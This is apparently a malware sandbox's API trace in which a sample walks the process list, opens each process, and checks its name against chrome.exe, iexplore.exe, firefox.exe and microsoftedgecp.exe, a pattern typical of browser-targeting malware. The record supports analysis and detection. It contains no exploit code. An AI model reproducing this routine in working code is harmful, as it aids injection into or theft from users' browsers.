	[0223.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.329] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0223.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.329] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5680
	[0223.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.330] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.331] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.331] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.331] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.332] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0223.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5684
	[0223.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.332] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0223.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.333] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.333] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0223.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.334] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.334] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0223.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5688
	[0223.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.335] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0223.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.335] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.336] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0223.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.336] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.336] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0223.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x568c
	[0223.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.337] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0223.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.338] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.338] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0223.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.338] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0223.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5690
	[0223.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.339] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.339] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.340] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.340] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.340] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5694
	[0223.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.341] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.341] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.342] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.342] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5698
	[0223.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.343] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.343] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.344] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.344] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.344] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x569c
	[0223.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.345] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.345] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.346] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.347] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x56a0
	[0223.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.348] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.348] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.348] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.349] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.349] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x56a4
	[0223.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.350] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.350] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.350] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.351] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.351] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x56a8
	[0223.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.352] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.352] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.352] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.353] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.353] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x56ac
	[0223.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.354] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.354] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.355] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.355] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0223.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x56b0
	[0223.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.356] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0223.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.356] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.356] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0223.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.357] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x56b4
	[0223.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.358] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.358] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.358] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.359] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0223.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x56b8
	[0223.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.361] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.361] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x56bc
	[0223.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.362] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x56c0
	[0223.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.364] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.365] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.365] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.365] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x56c4
	[0223.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.366] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.367] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.367] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.367] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0223.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x56c8
	[0223.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.369] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0223.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.369] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.369] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0223.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.369] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.370] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0223.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x56cc
	[0223.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.370] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.371] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.371] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.371] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0223.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x56d0
	[0223.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.372] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0223.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.373] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.373] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0223.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.373] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.373] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0223.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0223.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0223.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x56d4
	[0223.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.375] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0223.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.375] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.376] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0223.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.377] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.379] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0223.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x56d8
	[0223.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.381] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0223.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.381] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.382] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0223.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.382] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.382] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0223.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x56dc
	[0223.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.383] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0223.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.383] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.384] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0223.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.384] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
